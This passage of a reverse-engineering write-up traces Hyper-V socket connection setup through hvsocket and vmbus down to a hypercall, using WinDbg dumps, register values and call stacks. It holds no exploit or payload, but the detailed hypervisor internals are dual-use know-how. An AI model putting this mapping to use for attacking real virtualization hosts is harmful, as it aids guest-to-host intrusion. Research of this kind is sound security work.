<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {a5201c21-2770-4c11-a68e-f182edb29220}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #3 @ 0xffffaf89ade0c870</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {acef5661-84a1-4e44-856b-6245e69f4620}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #4 @ 0xffffaf89adc6a960</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {b1d00d3e-fe10-4570-ad62-7648779d7a1b} – Our service</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #5 @ 0xffffaf89ad8ddc20</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {b1d00d3e-fe10-4570-ad62-7648779d7a1c} – Testing service</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #6 @ 0xffffaf89ad90bcd8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {00000000-0000-0000-0000-000000000000}</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Item #7 @ 0xffffaf89adbc1590</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {7fdfd0ea-cea8-4576-92d6-e072ddd2c422}</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In function there is hvsocket!VmbusTlResolvePartitionId call, parameter is transmitted through xmm0 into which GUID of the virtual machine received through Get-VM - name of $VMName.Id is loaded.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">As hvsocket!VmbusTlFindAndReferencePartition occurs comparison of the transferred GUID with the known GUID (child, zero or parent partition). At coincidence the same GUID comes back to rdi.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rbx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5a0 00000004 00000000 00000002 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5b0 00000001 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5c0 00000000 00000000 00060001 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5d0 0a21b5d0 ffff8907 0a21b5d0 ffff8907 ..!.......!.....</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffff8907`0a21b5e0 00000000 00000000 00000000 00000000 ................</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">lea rbx, [rcx-0D8h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mov rax, [rbx+0E8h]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cmp rax, [rdx]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GUID @rbx+e8h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {90db8b89-0d35-4f79-8ce9-49ea0ac8b7cd} - </span><span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _GUID @rbx+e8h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {a42e7cda-d03f-480c-9cc2-a4de20abb878} - </span><span style="background-color: transparent; color: #222222; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_PARENT</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Function does not find GUID and returns 0 that leads to return of error code 0x0C0000141.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!error 0C0000141</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Error code: (NTSTATUS) 0xc0000141 (3221225793) - The address handle given to the transport was invalid.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next are caused: hvsocket!VmbusTlCreateConnection->hvsocket!VmbusTlCreateEndpoint->hvsocket! VmbusTlCreateObjectFromLookasideList</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before function call:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem @r8 -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Mex External 3.0.0.7172 Loaded!</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffdc00c33555a8</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 1 items.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After function call:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!mex.foreachitem ffffdc00c33555a8 -c</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffdc00c33555a8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e75920830</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Processed 2 items.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then Work Queue hvsocket!VmbusTlEndpointActionWorkQueueRoutine is initialized (through netio! NetioInitializeWorkQueue). Return from hvsocket!VmbusTlCreateEndpoint. Further 2 DPC are initialized: hvsocket! VmbusTlConnectTimeoutDpc and hvsocket! VmbusTlOppositeEndpointDisconnectTimeoutDpc (also initialization of the timer is carried out – without KeSetTimer). We return from hvsocket! VmbusTlCreateConnection in hvsocket! VmbusTIProviderConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further there is hvsocket!VmbusTlContainerGetVmId call (in detail was considered in the section Bind earlier). Then hvsocket!VmbusTlAssociateConnectionToPartition is caused. Parameters</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r xmm1:ud</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xmm1=78b8ab20 dea4c29c 480cd03f a42e7cda</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>r xmm0:ud</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">xmm0=cdb7c80a ea49e98c 4f790d35 90db8b89</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then hvsocket! VmbusTlSetupConnection (the 2nd parameter is LIST_ENTRY element which was created by the hvsocket! VmbusTlCreateObjectFromLookasideList function) from which hvsocket!VmbusTlSetObjectCancellable is caused (1 element is added to earlier created AVL table, before that table is empty).</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further hvsocket!VmbusTlXPartChildSetupConnection from where hvsocket!VmbusTlSetupConnectionId is caused (in our case work went with HV_GUID_ZERO, but if the transferred GUID differs, then nt!ExUuidCreate is caused and then hvsocket!VmbusTlSetEndpointId), then vmbus!ChTlConnectRequest is caused, 3rd parameter is GUID of the our service:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _GUID @r8 -r</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (*((_GUID *)0xffffdc00c3355550)) : {B1D00D3E-FE10-4570-AD62-7648779D7A1B} [Type: _GUID] </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(if function returns 0, then error code 0x0C000009A will be returned further)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Further vmbus!ChAllocateSendMessageSized -> vmbus! XPartAllocateSendMessage are caused (comes down to nt!ExAllocatePoolWithTag call and zeroing allocating memory) and already habitual work with vmbus described in the previous article also begins (Hyper-V Internals - http://hvinternals.blogspot.com/2015/10/hyper-v-internals.html). If vmbus! ChAllocateSendMessageSized was executed successfully </span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!ChAllocateSendMessageSized</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!ChTlConnectRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlXPartChildSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdConnect</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">and the pool was allocated, vmbus!ChSendMessage is carried out</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rdx - the 2nd vmbus!ChSendMessage parameter</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e`758d8ba8 00000015 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e`758d8bb8 00000000 00000000 b1d00d3e 4570fe10 ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffc80e`758d8bc8 487662ad 1b7a9d77</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">winhv!WinHvPostMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!PncSendMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!XpartSendMessage (jmp from </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmbus!ChSendMessage</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">vmbus!ChTlConnectRequest</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlXPartChildSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlSetupConnection</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket!VmbusTlProviderConnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdConnect</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">There is parameters of winhv!WinHvPostMessage</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rcx = 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rdx = 1</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">R9 = 0x28</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @r8 @r8+28 – a message body</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa60d`d4eaebb8 00000015 00000000 00000000 00000000 ................</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa60d`d4eaebc8 00000000 00000000 b1d00d3e 4570fe10 ........>.....pE</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffa60d`d4eaebd8 487662ad 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before winhv!WinHvpHypercallRoutine call (goes to vmcall)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Rcx = 0x5c</span></div>
